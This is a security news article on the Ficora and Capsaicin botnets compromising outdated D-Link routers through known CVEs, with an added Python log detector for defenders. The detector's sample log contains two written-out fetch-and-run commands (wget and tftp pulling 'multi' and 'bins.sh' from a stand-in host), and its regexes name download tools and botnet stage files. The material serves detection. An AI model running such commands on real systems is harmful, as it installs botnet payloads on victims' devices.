Outdated D-Link Routers Targeted by Ficora and Capsaicin Botnets

December 29, 2024

Recent cyberattacks have seen two botnets, known as 'Ficora' and 'Capsaicin', exploiting outdated D-Link routers. These routers, some of which have reached end of life, remain popular among both individuals and organizations. The devices targeted include DIR-645, DIR-806, GO-RT-AC750, and DIR-845L. The botnets gain initial access to these devices through known vulnerabilities (CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112). Once a device is compromised, the attackers exploit weaknesses in D-Link's HNAP management interface and carry out malicious commands through a GetDeviceSettings action. The botnets are capable of stealing data and executing shell scripts. It appears that the attackers primarily use the compromised devices for distributed denial-of-service (DDoS) attacks.

Ficora, which is an updated version of the Mirai botnet designed to exploit D-Link devices, has been observed in various locations, with a concentration in Japan and the United States. The botnet's activity, according to Fortinet's telemetry data, is sporadic, with significant spikes in October and November. After gaining initial access to D-Link devices, Ficora uses a shell script named 'multi' to download and execute its payload through various methods such as wget, curl, ftpget, and tftp. The malware comes with a built-in brute-force component with hard-coded credentials to infect additional Linux-based devices across multiple hardware architectures. Its DDoS capabilities include UDP flooding, TCP flooding, and DNS amplification to maximize the impact of its attacks.

Capsaicin, on the other hand, is a variant of the Kaiten botnet, believed to be developed by the Keksec group, which is known for 'EnemyBot' and other malware families targeting Linux devices. Fortinet observed a burst of Capsaicin activity between October 21 and 22, primarily targeting East Asian countries. The infection process involves a downloader script ('bins.sh'), which fetches binaries with the prefix 'yakuza' for different architectures, including arm, mips, sparc, and x86. The malware actively seeks and disables other botnet payloads active on the same host. In addition to its DDoS capabilities, which are similar to those of Ficora, Capsaicin can also gather host information and send it to the command and control (C2) server for tracking.
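As an added defensive example (not code from the article or from Fortinet), the following Python sketch flags HNAP GetDeviceSettings requests that carry the download tooling and stage names described above for both Ficora ('multi', wget/curl/ftpget/tftp) and Capsaicin ('bins.sh', 'yakuza' binaries). The JSON log format, the sample records and every address in them are constructed for this example.

```python
import json
import re

# Constructed sample log (not real D-Link output): one JSON record per line, as a
# gateway or IDS sitting in front of the router's HNAP interface might emit them.
SAMPLE_LOG = """\
{"src": "203.0.113.7", "path": "/HNAP1/", "soap_action": "http://purenetworks.com/HNAP1/GetDeviceSettings", "body_excerpt": "wget http://198.51.100.4/multi -O /tmp/m; sh /tmp/m"}
{"src": "192.0.2.20", "path": "/HNAP1/", "soap_action": "http://purenetworks.com/HNAP1/GetDeviceSettings", "body_excerpt": "<GetDeviceSettings xmlns=\\"http://purenetworks.com/HNAP1/\\"/>"}
{"src": "203.0.113.9", "path": "/HNAP1/", "soap_action": "http://purenetworks.com/HNAP1/GetDeviceSettings", "body_excerpt": "tftp -g -r bins.sh 198.51.100.4 && sh bins.sh"}
{"src": "192.0.2.21", "path": "/status.html", "soap_action": "", "body_excerpt": ""}
"""

# Download utilities the article says Ficora's 'multi' script uses to fetch payloads.
DOWNLOAD_TOOLS = re.compile(r"\b(wget|curl|ftpget|tftp)\b")
# Stage names reported for these campaigns: Ficora's 'multi' script, Capsaicin's
# 'bins.sh' downloader and its 'yakuza'-prefixed binaries.
KNOWN_STAGES = re.compile(r"(?<![\w.-])(multi|bins\.sh|yakuza\w*)(?![\w.-])")
# Shell separators and command substitution have no place in a SOAP request body.
SHELL_META = re.compile(r"[;|`]|\$\(|&&")


def inspect_record(rec: dict) -> list[str]:
    """Return the reasons one HNAP request record looks like botnet staging."""
    if not rec.get("soap_action", "").endswith("/GetDeviceSettings"):
        return []
    body = rec.get("body_excerpt", "")
    reasons = [f"download-tool:{m}" for m in DOWNLOAD_TOOLS.findall(body)]
    reasons += [f"known-stage:{m}" for m in KNOWN_STAGES.findall(body)]
    if SHELL_META.search(body):
        reasons.append("shell-metacharacters")
    return list(dict.fromkeys(reasons))  # de-duplicate, keep order


def analyze(log_text: str) -> list[dict]:
    """Parse one JSON record per line and return the suspicious ones."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        reasons = inspect_record(rec)
        if reasons:
            findings.append({"src": rec["src"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding["src"], ", ".join(finding["reasons"]))
```

A hit on a GetDeviceSettings request is a compromise indicator for a device the vendor no longer patches, so the response is isolation and replacement rather than just blocking the source.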

To protect routers and IoT devices from botnet malware infections, it is recommended to keep them updated with the latest firmware version, which should address known vulnerabilities. If a device has reached end-of-life and no longer receives security updates, it should be replaced with a new model. As a general rule, default admin credentials should be replaced with unique and strong passwords, and remote access interfaces should be disabled if not necessary.
